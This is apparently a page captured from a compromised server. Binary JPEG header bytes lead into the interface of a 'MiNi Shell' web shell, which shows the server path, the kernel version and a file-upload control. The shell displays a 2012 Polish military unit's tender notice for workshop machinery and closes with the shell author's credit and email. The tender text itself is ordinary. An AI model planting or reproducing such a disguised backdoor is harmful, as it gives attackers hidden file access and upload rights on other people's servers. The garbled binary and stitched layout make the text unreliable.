JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120418/123610-N-2012.html

<p class="kh_header"><b>Elbląg: DOSTAWA URZĄDZEŃ WARSZTATOWYCH</b><br>
<b>Numer ogłoszenia: 123610 - 2012; data zamieszczenia: 18.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 3751 , ul. Królewiecka 130, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 055 230 26 55, faks 055 230 34 15.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA URZĄDZEŃ WARSZTATOWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Cała oferta na dostawę urządzeń warsztatowych obejmuje cztery zadania:
Zadanie nr 1 - Frezarka uniwersalna - 1 kpl.;
Zadanie nr 2 - Podnośnik dwukolumnowy - 1 kpl.;
Zadanie nr 3 - Urządzenie do czyszczenia suchym lodem - 1 kpl.;
Zadanie nr 4 - Automatyczna myjnia komorowa - 1 kpl.;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 43.80.00.00-1, 42.62.30.00-9, 42.41.30.00-4, 42.99.50.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie treści wymaganych oświadczeń i dokumentów, o których mowa w § 10 SIWZ na zasadzie stwierdzenia: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie treści wymaganych oświadczeń i dokumentów, o których mowa w § 10 SIWZ na zasadzie stwierdzenia: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie treści wymaganych oświadczeń i dokumentów, o których mowa w § 10 SIWZ na zasadzie stwierdzenia: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie treści wymaganych oświadczeń i dokumentów, o których mowa w § 10 SIWZ na zasadzie stwierdzenia: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie treści wymaganych oświadczeń i dokumentów, o których mowa w § 10 SIWZ na zasadzie stwierdzenia: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetarg.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 3751
82-300 ELBLĄG
ul. Królewiecka 130 
 
Komórka zamówień publicznych, budynek nr 1, II wejście, I piętro, pomieszczenie pracy nr 119..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2012 godzina 12:00, miejsce: Jednostka Wojskowa 3751
ul. Królewiecka 130 
82-300 ELBLĄG

kancelarii sztabu JW 3751, budynek nr 1, I wejście, I piętro, pomieszczenie nr 105..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa frezarki uniwersalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -Zadanie nr 1 - Frezarka uniwersalna - 1 kpl. 

Frezarka uniwersalna powinna posiadać wszelkie wymagane atesty oraz oznaczenie CE i certyfikat zgodności lub deklarację zgodności, ponadto spełniać wymagania zawarte w Polskich Normach przenoszących europejskie normy zharmonizowane wg dyrektywy maszynowej 2006/42/WE 
1. Urządzenie powinno zapewnić:
1)	Możliwość obróbki płaszczyzn poziomych i skośnych, łuków, rowków, otworów, kół zębatych i innych części;
2)	Posuw automatyczny dla trzech osi (prawo-lewo; przód-tył; góra-dół; - X; Y; Z)
3)	Posuw przyśpieszony dla trzech osi (X; Y; Z);

2. Wymagane wyposażenie i możliwości techniczne frezarki:
1)	Wyposażenie w uniwersalną obrotową głowicę do frezowania;
2)	Wyposażenie dodatkowo w imadło maszynowe;
3)	Możliwość zamontowania w wrzecionie: frezu cylindrycznego, frezu o zarysie łukowym, frezu kształtowego, frezu walcowo - czołowego;
4)	Odczyty cyfrowe dla trzech osi;
5)	Podzielnica uniwersalna z uchwytem tokarskim, o150; 
6)	Minimalny zakres posuwu X; Y; Z = 1200/400/400
7)	Zakres prędkości wrzeciona: 40÷1600 obr/min.
8)	System bezpieczeństwa zabezpieczający przed ponownym samoczynnym włączeniem się urządzenia w przypadku zaniku napięcia zasilającego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.62.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa podnośnika dwukolumnowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -Zadanie nr 2 - Podnośnik dwukolumnowy - 1 kpl. 

Podnośnik dwukolumnowy stacjonarny powinien posiadać wszelkie wymagane atesty i dopuszczenia zgodnie z Rozporządzeniem Ministra Gospodarki z dn. 28.12.2001r. w sprawie warunków technicznych dozoru technicznego, jakim powinny odpowiadać dźwigniki (Dz. U. Nr 4 poz. 43 z 2002r.) oraz oznaczenie CE i certyfikat zgodności lub deklarację zgodności, ponadto spełniać wymagania zawarte w Polskich Normach przenoszących europejskie normy zharmonizowane. 
1. Podnośnik powinien zapewnić:
1)	Udźwig pojazdów kołowych o masie: do 3200 kg - włącznie (także w pełnym zakresie wysunięcia regulowanych ramion nośnych);
2)	Wysokość podnoszenia: min. 1900 mm (mierzona od podstawy do górnej krawędzi łapy nośnej);
3)	Szerokość przejazdu pomiędzy kolumnami winna wynosić: min. 2600mm
4)	Regulacje punktu podparcia pojazdu poprzez cztery trzyczęściowe ramiona nośne o regulowanej długości; 
5)	Automatyczne blokowanie ramion nośnych podczas podnoszenia w najwyższym punkcie i odblokowywanie po osiągnięciu poziomu podłogi przy opuszczaniu;
2. Wymagane wyposażenie i możliwości techniczne podnośnika dwukolumnowego:
1)	Napęd elektromechaniczny;
2)	Płynne podnoszenie i opuszczanie pojazdów nawet w przypadku nierównomiernego rozłożenia ciężaru;
3)	Automatyczna ochrona przed przeciążeniem;
4)	System bezpieczeństwa, zabezpieczający przed samowolnym opadnięciem ładunku (działający zarówno podczas podnoszenia i opuszczania ładunku jak również w sytuacji wyłączonego napędu);
5)	Kolumna musi być wyposażona w wyłącznik zasilania całego urządzenia;
6)	Możliwość natychmiastowego zatrzymania pracy podnośnika w momencie zwolnienia przycisku opuszczania bez możliwości dalszego ruchu łap nośnych podnośnika w dół;
7)	Dostarczona wraz z urządzeniem jego dokumentacja winna zapewniać skuteczne badania odbiorcze urządzenia i dopuszczenie go do pracy przez inspektorów Wojskowego Dozoru Technicznego w Olsztynie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.41.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa urządzenie do czyszczenia suchym lodem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -Zadanie nr 3 - Urządzenie do czyszczenia suchym lodem - 1 kpl.

Przenośne urządzenie do czyszczenia suchym lodem powinno posiadać wszelkie wymagane atesty i dopuszczenia zgodnie z Rozporządzenie Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 9 lipca 2003r. w sprawie warunków technicznych dozoru technicznego w zakresie eksploatacji niektórych urządzeń ciśnieniowych  (Dz. U. Nr 135, poz. 1269) oraz oznaczenie CE i certyfikat zgodności lub deklarację zgodności, ponadto spełniać wymagania zawarte w Polskich Normach przenoszących europejskie normy zharmonizowane. 

1. Urządzenie do czyszczenia suchym lodem powinno zapewnić:
1) Moc przyłącza - min. 0,6 kW;
2) Ciśnienie powietrza: do 1,6MPa; 
3)	Wydatek powietrza do 12m3/min;
4)	Poziom ciśnienia akustycznego nieprzekraczający 130 dB;
5)	Pojemność zbiornika suchego lodu: 30 - 40 kg;
6)	Zużycie suchego lodu do 100 kg/h

2. Wymagane wyposażenie i możliwości techniczne urządzenia do czyszczenia suchym lodem:
1)	System bezpieczeństwa odpowiadający normom i przepisom bhp i ppoż. dla danego urządzenia;
2)	Zewnętrzne regulatory ciśnienia, szybkozłączki, redukcje oraz dysze do czyszczenia trudnodostępnych miejsc;
3)	Ergonomiczny aplikator pozwalający na szybką i łatwą wymianę dysz;
4)	Skrzynka na wyposażenie;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.99.50.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa myjnia automatycznej na zimno i na gorąco.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -Zadanie nr 4 - Myjnia automatyczna na zimno i na gorąco - 1 kpl.

Automatyczna myjnia komorowa do mycia elementów na gorąco i na zimno powinna posiadać wszelkie wymagane atesty oraz oznaczenie CE i certyfikat zgodności lub deklarację zgodności, ponadto spełniać wymagania zawarte w Polskich Normach przenoszących europejskie normy zharmonizowane wg dyrektywy maszynowej 2006/42/WE. 

1. Urządzenie powinno zapewnić:
1)	Możliwość mycia i odtłuszczania w obiegu zamkniętym myjni;
2)	Możliwość mycia zimną i ciepłą wodą z dodatkiem niepieniących się detergentów;
3)	Możliwość ustawienia temperatury mycia w myjni w zakresie do 75oC;
4)	Możliwość ustawienia ciągłej pracy myjni w zakresie do 60 min.;
5)	Szczelność komory myjącej z zabezpieczeniem przed otwarciem w czasie pracy urządzenia;
6)	Obroty kosza w trakcie mycia (średnica kosza 800÷1200 mm);
7)	Dopuszczalne obciążenie kosza obrotowego do 300 kg 
8)	Obudowa i elementy urządzenia muszą gwarantować odporność na czynnik myjący i temperaturę;

2. Wymagane wyposażenie i możliwości techniczne myjni:
1) napęd kosza elektryczny, hydrauliczny, hydrodynamiczny lub mieszany;
2) automatyczna ochrona przed przeciążeniem kosza obrotowego;
3) automatyczne zatrzymanie procesu mycia w przypadku przypadkowego otwarcia komory myjącej;
4) system bezpieczeństwa, zabezpieczający przed ponownym samoczynnym włączeniem w przypadku zaniku napięcia zasilającego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.99.50.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com